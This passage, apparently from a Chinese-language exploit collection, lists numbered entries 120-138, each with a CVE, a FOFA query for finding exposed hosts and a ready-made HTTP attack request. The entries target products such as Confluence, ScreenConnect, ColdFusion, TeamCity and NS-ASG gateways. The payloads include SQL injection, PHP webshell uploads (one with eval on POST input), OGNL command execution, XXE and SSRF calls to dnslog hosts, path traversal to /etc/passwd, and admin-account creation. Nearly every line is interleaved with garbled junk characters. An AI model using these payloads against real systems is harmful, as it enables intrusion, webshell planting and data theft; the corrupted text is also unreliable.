: r" u9 l/ M+ ^1 ~. u8 oX-Remote-Ip: 1.1.1.1
) D/ w. V& V7 a. d$ |X-Remote-Addr: 1.1.1.1
% O- m/ b# [ }: a: {3 p7 m: Q' oTe: trailers
& a/ x. ^2 N! u/ \/ WConnection: close
5 k- b5 {* c3 T' ?/ y
9 I$ ?, J: M3 Q; U1 o8 j; Qsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234562 B. u4 G/ Y* T4 I# q9 Q
& E% n( L$ f1 A* O" P1 B' X
8 ?+ P9 ?$ _, h$ y120. 北京百绰智能S40管理平台导入web.php任意文件上传1 X4 U4 x' g" B- h8 n% ~. r6 i
CVE-2024-12539 B$ j" O3 q+ _# I% U7 g& M. J
FOFA:title="Smart管理平台"
5 J/ T( x- O" r) {$ V! TPOST /useratte/web.php? HTTP/1.1
5 `# W* ~/ A! m; ?' w0 l+ d. @; Q# QHost: ip:port
6 X- O% X9 K- p5 S+ N1 }Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db/ a- `/ _6 ]& @8 z) J, V7 g
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
- [* J' w6 T* }- H! b5 B F/ XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 Y1 t- @% i' y W3 X1 Y5 a/ y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* z @& U* g8 w2 ~: yAccept-Encoding: gzip, deflate
3 u' H, |% B c6 @6 sContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328( O" T9 Z+ }# H, B: i
Content-Length: 597" G I, D3 G' i. F7 f7 `$ j$ {/ ?
Origin: https://ip:port% {/ l( m& z3 U. @. L4 l) y5 b$ D4 F
Referer: https://ip:port/sysmanage/licence.php
' X2 z% e. {' `/ X9 p6 U2 I% YUpgrade-Insecure-Requests: 1: p8 s* D7 O4 A# t3 h
Sec-Fetch-Dest: document
' Q# G' w Z# n- ~. U( k3 ZSec-Fetch-Mode: navigate9 [0 _+ j, D* w! _3 \7 v% O- D% X
Sec-Fetch-Site: same-origin6 q1 o8 I! V" `1 p
Sec-Fetch-User: ?1" n3 B3 |2 f( ^
Te: trailers
: r# e- S/ L4 v' }. M: y/ g( IConnection: close
A! c. y% ~9 `( m1 r3 D* K+ R# q- j' m! t, s& g
-----------------------------42328904123665875270630079328
$ b ~6 B5 x6 \5 L/ f" G' IContent-Disposition: form-data; name="file_upload"; filename="2.php"4 I9 S- ]& _9 q" ^* p
Content-Type: application/octet-stream
+ ^9 \0 d+ ?' {1 s K0 @
0 k, v. ~) f" O. ]# ~8 A! k8 v<?php phpinfo()?>0 J9 S( ?3 \; F+ o3 q
-----------------------------423289041236658752706300793282 G/ P! E* p6 g7 X e" M
Content-Disposition: form-data; name="id_type"
* }; ]' Z5 D l) |
5 l8 b# r& Q- _2 q' n: n* I1
: M3 K! E k0 M, Y$ J-----------------------------42328904123665875270630079328
* P# C+ f; N2 L: Z2 S' d( ?Content-Disposition: form-data; name="1_ck"
- e0 }5 f$ Y( ]7 {
, h1 J5 y \( u. ?' U/ R! \1_radhttp* Q! l9 u& M6 G3 N( O/ R$ D3 N
-----------------------------423289041236658752706300793289 J4 q2 `. o5 ]) Y: v
Content-Disposition: form-data; name="mode"% i- G1 W0 c) J# U6 u
0 Y& n6 s3 A! P0 f1 H# I
import5 K$ o. }+ h' I* H& U; T
-----------------------------42328904123665875270630079328. {: b, i% ]: x+ n
( `4 r# A2 {$ y" m6 d- B6 Z* j7 K
2 V1 d5 |& }& U2 ~ B R
文件路径/upload/2.php9 }3 Z1 M# h' R5 W: {# Z
# Q1 N3 {$ {5 @& }8 r2 W4 l0 Z121. 北京百绰智能S42管理平台userattestation.php任意文件上传) M$ B" e. C* l+ N* R
CVE-2024-1918* x; j! u6 f/ `7 \, ?/ Y; o! T
FOFA:title="Smart管理平台"
# y$ L% W% y5 T" p1 n6 h, nPOST /useratte/userattestation.php HTTP/1.1
9 P& T, u% n" s, QHost: 192.168.40.130:8443
( k0 T' v6 |" j; BCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50) l: U& {* N; v1 }6 Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko: L& x4 _1 `5 v, J: \9 k( P6 O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 |" B1 W" X0 L% ^% u; v" [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ x; U( d0 n2 b% p5 M+ L `Accept-Encoding: gzip, deflate* C ], n2 k8 K0 g( `
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
$ p E: B* b: k8 bContent-Length: 592
) s: B8 e# p" }; F, BOrigin: https://192.168.40.130:8443
; Y4 s$ I4 _/ L; p. Z4 {1 F- x; CUpgrade-Insecure-Requests: 1$ I* e/ B% w; P- ^+ X6 `0 S; u
Sec-Fetch-Dest: document
4 w+ r9 P; \3 a8 { ~Sec-Fetch-Mode: navigate7 V! n7 O$ W' o$ ^, t) v8 \0 _
Sec-Fetch-Site: same-origin3 t4 o* E0 C0 }" w
Sec-Fetch-User: ?1
+ ?; l& x1 ?9 M K! U P) ZTe: trailers; c0 x3 l5 H9 {) p- o1 H
Connection: close
& n6 u- U' N2 C$ q, l R' ^" O$ [3 q0 H: d6 `
-----------------------------42328904123665875270630079328
! ?6 S* @# {0 \0 P, S! ^Content-Disposition: form-data; name="web_img"; filename="1.php"
" m" p1 W s2 r* ZContent-Type: application/octet-stream: n9 {, u+ d& w2 C) E$ m& S% `
1 Q+ a8 y: O6 I+ n2 l( c5 R
<?php phpinfo();?>
& g! h) J0 K) d2 U: h& a-----------------------------42328904123665875270630079328' C% P6 t) F& C
Content-Disposition: form-data; name="id_type"
. g: e: [3 a I% C5 T$ L7 }2 U: ^3 A/ U0 S( B' ^5 v
1( Y. A z3 q* u2 \
-----------------------------42328904123665875270630079328
; y! }7 y, O' u: q/ n; Z3 m) H; iContent-Disposition: form-data; name="1_ck"
) D( ^9 J8 p% y- |, `: J4 l3 A- U9 w
1_radhttp! T$ ^) f4 C' m4 N- Y6 s
-----------------------------42328904123665875270630079328
1 {; `6 z# T2 l1 cContent-Disposition: form-data; name="hidwel"1 O# ] h" e7 F8 P0 j4 i, ^
8 p) g) G) K" a4 G' ] rset# W! G) F7 y2 P/ x+ b. H
-----------------------------42328904123665875270630079328' d/ \+ z- u9 I( d1 u$ i
3 L: ^0 |1 I% i! I2 l2 Y' m4 P. f2 M7 @! H8 p% ~5 z
boot/web/upload/weblogo/1.php
0 Y; h0 M* S8 B- {2 ? M7 Q4 W0 _5 f4 \! q/ b" H/ i) n7 N3 E
122. 北京百绰智能s200管理平台/importexport.php sql注入0 s3 o% [4 U% v! H0 u
CVE-2024-27718FOFA:title="Smart管理平台"- u- p. p7 t: W0 p
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()3 W. G& l! x; m L- ?
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1( o+ U( j3 [3 t
Host: x.x.x.x
$ C- r% v O+ ?, L6 \5 HCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
; m/ S1 L7 r8 E2 G, S4 h! UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
9 I1 t. p4 @- r! ~# oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 `' z; \, H2 U/ R; s( B7 ~2 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* p: f1 v* Y& P- h, i- O
Accept-Encoding: gzip, deflate, br! u- B5 L1 O4 F9 o4 X/ t
Upgrade-Insecure-Requests: 1
" X5 B: a3 l" l3 u+ e! m. n9 iSec-Fetch-Dest: document `- W9 h- f* W" O
Sec-Fetch-Mode: navigate
: y! \* L1 _6 h0 y; E, N2 FSec-Fetch-Site: none8 F7 l% h8 p1 B0 H, |! z; S
Sec-Fetch-User: ?1
& r7 {/ R' b; d+ j& g. O! ~Te: trailers
( L* B; c" U& j: P3 H* eConnection: close& ?! i0 S# C& f$ s% [3 e
" ]# ]. Z( U4 a! `- ?, P- W) R' n
( q* N7 p& G; _123. Atlassian Confluence 模板注入代码执行5 `7 z# a+ \0 x+ R) u7 P6 e* f- f* l
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
# R; I) \( r$ {/ I! R4 OPOST /template/aui/text-inline.vm HTTP/1.1
( c4 j) J- v9 j" V% lHost: localhost:8090$ z6 h w0 {" n+ k
Accept-Encoding: gzip, deflate, br
$ ?2 y$ U7 B( AAccept: */*0 M' Y" ]7 p5 J1 l- r# [
Accept-Language: en-US;q=0.9,en;q=0.8
* W9 a6 D; q! L$ x$ hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.367 L0 R) K, Y0 L9 J% @0 l
Connection: close9 V6 _/ t; G: B$ `: R
Content-Type: application/x-www-form-urlencoded" j) F8 Z0 b/ u. |( c" }: h
0 `7 [" N7 f/ A
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
0 u( K! j& z7 |8 H* c: [4 F: Q# k# ~- O# x/ k8 c
' Y; V& J: B, W$ i/ y8 }, [124. 湖南建研工程质量检测系统任意文件上传" v* k* m" J/ v& }7 e) s6 B9 C* O
FOFA:body="/Content/Theme/Standard/webSite/login.css"; Z3 i% ^ }& I8 j, w
POST /Scripts/admintool?type=updatefile HTTP/1.11 A5 [% e8 e6 X, i/ ]# i- D
Host: 192.168.40.130:82823 z) T( e. K0 C8 L2 P1 U- t
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36; i5 S( V8 ?& q8 _" X% I$ i) Q
Content-Length: 72
3 p7 T3 y6 x* ]$ c; zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.82 F0 H- ?8 o ^: E7 q6 P
Accept-Encoding: gzip, deflate, br
# z X+ e! @# V; i3 F" mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* e: k! v+ m& Z. [" N: ]/ \2 R b
Connection: close
+ e; X" G. [) I% ?' JContent-Type: application/x-www-form-urlencoded
/ O1 u2 X# v$ D/ e
. i- P: @) q, O- TfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
' m, j, t3 g& x' ~) Y5 j* P" |9 k% ^
0 k* p+ R1 a6 J! k; P6 `
http://192.168.40.130:8282/Scripts/abcgcg.aspx' p' w& m0 K7 ~3 S) l
- A' k0 \& r3 ` O* B* n. T
125. ConnectWise ScreenConnect身份验证绕过
j& Y7 c0 N4 _CVE-2024-1709
1 s4 s" z0 B: U: \* dFOFA:icon_hash="-82958153"
% B3 l5 A5 b+ C* ?6 Phttps://github.com/watchtowrlabs ... bypass-add-user-poc
% L8 A6 u c! W6 A8 F% `9 x8 Q- T/ i4 [' R
+ a8 @' ^2 w5 I2 h
使用方法0 C) `* E3 O: K$ U7 p' T' S
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
. W4 E$ N# t' J7 K! N2 K. I. g
4 t4 |0 S* p. `1 N/ ~' w6 u* f& V4 {% X1 H: z
创建好用户后直接登录后台,可以执行系统命令。: v3 S6 }5 ~+ C/ N, t; C6 c5 \' P
2 K9 C- C* O1 e3 x3 r: i+ y
126. Aiohttp 路径遍历
; _+ w* A% }$ I, m; m( B6 R2 KFOFA:title=="ComfyUI"/ M, s3 _: t* b) ~$ G x) T9 p
GET /static/../../../../../etc/passwd HTTP/1.1# Z; x& A- H, v# p7 D( N+ a
Host: x.x.x.x" o/ Q+ r, R1 m& N% {5 F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
& S/ w# x( ^: b4 x k# T2 _Connection: close
# q/ {* M C! E. dAccept: */*# w2 P. v. u0 M4 ` J5 [
Accept-Language: en3 q1 L! o* n- \& [
Accept-Encoding: gzip
/ y% J% I1 P2 l$ M3 K& o$ L! A' U# R/ `/ {. [& \
- @+ x0 Y2 G7 f( m6 X! M; p
127. 广联达Linkworks DataExchange.ashx XXE$ L: I. I; ?2 M, I
FOFA:body="Services/Identification/login.ashx" , O+ |4 {* s/ H9 K, ?7 _
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
- W, d, a3 A: u7 s% ~( h4 P- UHost: 192.168.40.130:8888 f% d' {, A1 y; ~ h$ h( M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36$ a9 Q/ H7 f. A [; l
Content-Length: 4154 g. z D- ]5 h6 H4 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 E' l* H; L+ i: q3 k& [, X
Accept-Encoding: gzip, deflate
: g0 }8 ]+ M: i. M# n; h* G7 ZAccept-Language: zh-CN,zh;q=0.9
) q, B; V2 _! WConnection: close7 \5 k# O K$ H2 ~$ h- o
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
! V+ ]* f/ T1 J/ h3 UPurpose: prefetch
' N9 {" ?0 ]! }* B0 Q/ C) y& tSec-Purpose: prefetch;prerender
% z9 C& Q- [' J% l A$ i! t$ W1 R' H4 D8 R- u/ X+ x/ x. H
------WebKitFormBoundaryJGgV5l5ta05yAIe0
1 X8 c5 R- D' U5 }* l& g1 x: `) ?Content-Disposition: form-data;name="SystemName"
) E, p/ U# T8 i5 @6 R9 b
6 q" }4 x7 d7 o1 D' f cBIM V5 c3 w8 q1 G; E7 _7 `5 l
------WebKitFormBoundaryJGgV5l5ta05yAIe04 P+ m0 P6 v6 h, ~
Content-Disposition: form-data;name="Params"
" ]/ z" N4 ?+ [9 `Content-Type: text/plain1 c/ J+ D% ?% a0 A8 {/ ~
1 o4 S% x4 Q) n& B( n) t& ^
<?xml version="1.0" encoding="UTF-8"?>( e7 w& }: N! {
<!DOCTYPE test [- e5 b* _. V3 M# I* }5 J( _
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">) A$ ]- n1 K) G/ U7 P
]
0 k' p* y! a1 e( D7 P( U e0 @0 P>
9 l3 D# x3 b" n4 N1 X8 D% J8 L<test>&t;</test>, E& w- V# G8 r# b7 L" |0 Y
------WebKitFormBoundaryJGgV5l5ta05yAIe0--. t! @9 W3 B" ?! n; s
: R, r/ M1 b6 |7 p& z1 f
% b+ v6 X* i% I7 Q3 K4 v. F: @/ ?" G: y6 Y' s8 E
128. Adobe ColdFusion 反序列化6 X5 O$ e% v; @7 h/ t6 j
CVE-2023-38203 f' J+ A* D2 g
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本). Q5 i0 Q! z( q0 X+ c1 ]! |) ^9 {
FOFA:app="Adobe-ColdFusion", a' ?6 y$ P& P0 x/ M7 I( [
PAYLOAD
3 t' X/ r8 h- a+ a9 P3 e- ?$ k
- e/ A* R* r6 V129. Adobe ColdFusion 任意文件读取. |4 I4 y7 l* c. c' v- C1 N3 _/ ]
CVE-2024-207676 }0 E9 G1 J$ l/ G: _; C# H+ Z
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
5 A l2 A8 \- t9 q$ i第一步,获取uuid+ M" _2 m# `% t0 n6 L$ c' I* N
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1) n8 o: D& j) [6 R3 v$ u" |0 W
Host: x.x.x.x& N2 w# Q4 {9 G, s) T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
( E- f$ U) x$ b2 O6 c% b( {Accept: */*
2 p- J7 S) N9 X6 L% O; B; h AAccept-Encoding: gzip, deflate9 [' x3 N; v' H" s
Connection: close/ Q E4 C1 G6 f$ D
* v5 d, b3 A1 _+ ^4 v, y7 s# P+ w
/ `3 ]+ t' V1 s8 W
第二步,读取/etc/passwd文件, W: k" m$ _3 Z7 j Q/ X* O9 e! |
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1$ V" G2 J8 k' j% O9 N
Host: x.x.x.x) p6 J3 l3 q. }: \4 b# C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
& n7 p& Q: j% k: h- h* s* xAccept: */** e4 b4 |; D3 _) y
Accept-Encoding: gzip, deflate
- ^& I' l0 ^9 U! u) }3 lConnection: close
% \. x' _7 r4 F" h$ euuid: 85f60018-a654-4410-a783-f81cbd5000b9
; b! c& r4 |0 Q' I1 w- K J' q" @# m+ C9 P! X; ?) z: m7 E( R
' i% d5 A! b$ h& e' o
130. Laykefu客服系统任意文件上传
# m/ ^2 u5 r p# W' u' X$ V) b* uFOFA:icon_hash="-334624619"1 F* N' C7 Q2 @ J+ k* i% m
POST /admin/users/upavatar.html HTTP/1.1
" o5 ?+ u4 _ [0 A+ j8 l' mHost: 127.0.0.1* x' ^, `: z- J9 s( `; A, l0 D
Accept: application/json, text/javascript, */*; q=0.01% M/ m- W1 E8 p( d/ B: y5 S9 e
X-Requested-With: XMLHttpRequest' p! A" ?! J( j% ~( v
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26% Q; g6 W% C9 G* q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
' c- E/ E; @" P5 u- g, Y1 `3 Y, hAccept-Encoding: gzip, deflate% D5 b* @, k E4 u7 u# z
Accept-Language: zh-CN,zh;q=0.93 r# C3 T v" _8 [; M
Cookie: user_name=1; user_id=3
& `7 N/ R4 P6 H: ~Connection: close
5 h, h8 i% P1 M6 I# m; m
% F, `) r0 b0 P" X0 G! ?) a------WebKitFormBoundary3OCVBiwBVsNuB2kR
- l% F7 b0 X$ ]0 g1 K9 WContent-Disposition: form-data; name="file"; filename="1.php"( j3 a& @& I0 s
Content-Type: image/png
. H& O* s+ a' P( t
% Y7 p! R7 q' r4 W3 _7 O N- P<?php phpinfo();@eval($_POST['sec']);?>
. ? i& R& b1 S% [) ]7 P; `------WebKitFormBoundary3OCVBiwBVsNuB2kR--
: K4 n. y! \; g0 |' z' e/ g
^5 z0 E! c* x, R; k1 {; X5 X$ w, P! p# Q& m: z2 _ L4 Q
131. Mini-Tmall <=20231017 SQL注入! f$ E. s- K6 l
FOFA:icon_hash="-2087517259"# m7 h& y( i! l9 ?4 K# ~# R
后台地址:http://localhost:8080/tmall/admin
4 v5 d8 w: F- g% ghttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)7 _, Y. j) |" Z- d7 y4 b B0 Q
% g6 R$ v# y, ^
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
- }( ?+ t( h6 eCVE-2024-27198
1 L: E- i5 q IFOFA:body="Log in to TeamCity"
; C$ k, x8 G5 O+ SPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1# m* F" y; R0 d& H
Host: 192.168.40.130:81114 q% ]: B* W5 s4 h! L! g& G3 \: H U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 I% g8 v7 L6 K" N$ E
Accept: */*1 _9 k9 q( g. B0 k2 D* y" r6 q; A
Content-Type: application/json
/ ~, k' |7 k* Y, D! c* T8 d3 L+ ZAccept-Encoding: gzip, deflate
0 `6 O3 Q" N5 A: Z
. X+ L8 V$ R8 Y' x/ F! {{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
/ L! E' u7 l; e) l; A5 \
$ F* N" K) d0 G' x5 Y6 R& F4 V, l5 g& b" V: h4 k1 a: y3 a& H) B/ x) [
CVE-2024-27199
- t4 l8 ]" ~+ r5 P: X/res/../admin/diagnostic.jsp
4 g$ ]& R2 Q+ I; I k/.well-known/acme-challenge/../../admin/diagnostic.jsp3 C" o& B1 g4 ?0 m, \9 }
/update/../admin/diagnostic.jsp
' \/ K8 ]7 _+ b/ z+ v
3 o5 Y. r- n: O# ~
# s# g4 Z. V+ n6 dCVE-2024-27198-RCE.py" g9 F8 |# R8 u$ j' c9 G) [
9 D2 n# n7 E; [; v2 `# g6 Z- m133. H5 云商城 file.php 文件上传
. C5 d7 I$ r2 D: z! zFOFA:body="/public/qbsp.php"3 q- x2 K( m( B+ [
POST /admin/commodtiy/file.php?upload=1 HTTP/1.19 W1 J/ {: j% Z5 t2 m" x
Host: your-ip+ i" g( {( q' t$ ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
5 b) P \6 i6 o( }4 e+ |9 ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx3 @9 P4 a Q8 C3 t6 z l8 D
! E$ W& c) V% j z* d2 I. |. F5 }
------WebKitFormBoundaryFQqYtrIWb8iBxUCx Q6 n+ h( X% r6 F
Content-Disposition: form-data; name="file"; filename="rce.php"
+ i. V2 W; u7 ?9 ^! ~; U) {; E# t8 W& tContent-Type: application/octet-stream
! Z; Q+ e; R' U * M+ z* t: [5 j
<?php system("cat /etc/passwd");unlink(__FILE__);?> z! i7 t- a4 R, j
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
- Q6 e- O7 Q( v9 p$ d$ U
1 n1 l+ F9 n1 x: D" ~. |, }$ G
6 I0 q6 w$ X6 T* A
7 g; g6 X0 E; S: m$ {$ M# t3 r134. 网康NS-ASG应用安全网关index.php sql注入+ m0 q' K5 @7 z0 v: S
CVE-2024-2330: L7 B& f# m7 `" m+ Z
Netentsec NS-ASG Application Security Gateway 6.3版本
& h9 q2 r' k, R ?: dFOFA:app="网康科技-NS-ASG安全网关"
2 p9 a$ p9 ]/ L* D0 nPOST /protocol/index.php HTTP/1.1
# d) ]6 l) ?* r' U% w# l" h9 J" yHost: x.x.x.x$ M7 { U% R& P
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de, U; j9 @, E* f4 l% x4 d) A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
. V5 ^0 a0 \3 uAccept: */*% f3 F' x7 A+ E X9 O8 G* x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" K8 y4 m# z- M2 T6 G0 }6 oAccept-Encoding: gzip, deflate" K/ \! T x$ w( k0 X# z
Sec-Fetch-Dest: empty; H! @. U. }( ?" ?% y
Sec-Fetch-Mode: cors
1 r* @1 A8 d u; m! c+ e6 {7 oSec-Fetch-Site: same-origin
1 K9 [6 V. D# m( y) s! Y* yTe: trailers" Z, O0 F( q3 v4 y( ?# S1 B& s
Connection: close
6 r4 d* \3 \0 yContent-Type: application/x-www-form-urlencoded! [1 E/ L8 d) {4 N( `
Content-Length: 263
; m3 @$ s( l9 y& G0 F* f8 e
% { P8 R9 i% S/ ^$ {, M% p9 [jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}. N+ ?9 ?2 @* ~9 T( N( C8 x
7 j; I0 q4 P8 c; N x* Y) f! L& j) x% }1 b2 u* m; G8 S" V* Y
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入* E# f: I" g. a7 U* d
CVE-2024-20220 `- z: e. H( r2 C% } |
Netentsec NS-ASG Application Security Gateway 6.3版本
5 Z, X* H* z/ y6 V# s8 ]FOFA:app="网康科技-NS-ASG安全网关" k' _2 ~* B- q& G: D# E, V5 s
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
8 i5 r( }- {8 Z/ a' C X) g6 w9 pHost: x.x.x.x3 n1 ?# Z# Y2 B. |5 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: D; h9 u# B$ M4 {* n9 q/ I( H6 w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* c6 f* _' ?6 A# ^& Y( c5 R" t& X8 Q
Accept-Encoding: gzip, deflate) v. @% A; y3 W' D" h, V8 Q
Accept-Language: zh-CN,zh;q=0.9
" [8 y# P$ U1 |6 p6 S7 OConnection: close& |$ ^% U. p6 p0 o
8 E- C" I) R0 G
3 @# b z# L' A- K# }% |136. NextChat cors SSRF
$ y, j5 R* r% D! s( v+ l$ lCVE-2023-49785
/ g7 L1 E C/ w6 Z( \: q) vFOFA:title="NextChat"
9 k6 ]6 q4 G& P- K KGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
2 I7 b5 m* P4 P" KHost: x.x.x.x:10000" ]: l/ e; d5 E5 e8 E1 {! W- S
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ }( k6 e* M7 x- TConnection: close) q3 m5 J& s6 B# {( i3 n# T' `
Accept: */* Q: M- P0 K# G. ]5 D
Accept-Language: en
% B9 ?: h3 G# s4 Q/ dAccept-Encoding: gzip' d# n3 U' w* m/ S
3 {* A! l0 ?2 y5 `# c- ?6 j) U
( \) L6 n; M. ^137. 福建科立迅通信指挥调度平台down_file.php sql注入
' Y) Z0 _7 `" c) z% B1 BCVE-2024-2620" {4 q2 A; C" U
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
1 c0 K5 `9 `$ XGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
2 A: k4 K7 Q5 T e+ F3 KHost: x.x.x.x
# j; Z' L' C5 h' K7 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) z( i. ]: d+ K Q0 G( i3 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 N3 u" A: d. m- M; D$ @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 r$ |+ q2 U( z* J3 ]/ H0 [Accept-Encoding: gzip, deflate, br2 ?3 ]8 \- _8 t! H" E- T
Connection: close
! ~1 y, o! j" k# F3 oCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj) i* }8 K. W% v: ?5 c
Upgrade-Insecure-Requests: 1. X+ S0 D1 H9 C. p- b( X, v% [
1 B' P' d2 V1 y" |3 a) r; K* T! {+ N3 o+ l7 h( @
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入, K; K! K/ n1 G# f. F6 P
CVE-2024-2621
% m" J! Z1 v2 Q4 s/ X, {: ?FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
* _& K- d0 E7 s2 H9 ~GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1/ ]: \8 O9 f3 W4 j1 V$ O
Host: x.x.x.x, F5 K/ O- ]! _, Z& k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* V4 h x7 H6 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 l% _* C1 l5 n! p# ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 f: \9 s8 P4 L$ CAccept-Encoding: gzip, deflate, br' ~5 e9 c X$ j
